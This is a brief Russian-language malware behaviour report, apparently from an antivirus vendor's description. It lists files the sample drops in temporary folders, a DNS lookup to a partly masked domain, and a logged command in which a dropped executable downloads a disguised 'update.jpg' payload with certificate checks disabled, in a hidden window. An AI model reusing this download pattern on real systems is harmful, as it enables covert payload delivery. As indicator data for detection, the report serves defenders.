Техническая информация
- %TEMP%\newfile.tmp
- %TEMP%\zbys.tmp
- %TEMP%\sczs.log
- %TEMP%\sczss.log
- %TEMP%\sjwjm.tmp
- %APPDATA%\payerss.ini
- %TEMP%\53542167\1sass.exe
- %TEMP%\53542167\awrjyrj.exe
- <Полный путь к файлу>
- из <Полный путь к файлу> в %TEMP%\53542167\vplmabez.tmp
- DNS ASK in####llinks.com
- '%TEMP%\53542167\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\53542167\update.jpg
- '%TEMP%\53542167\1sass.exe' http://in####llinks.com/install/exe/update.jpg --no-check-certificate -O %TEMP%\53542167\update.jpg' (со скрытым окном)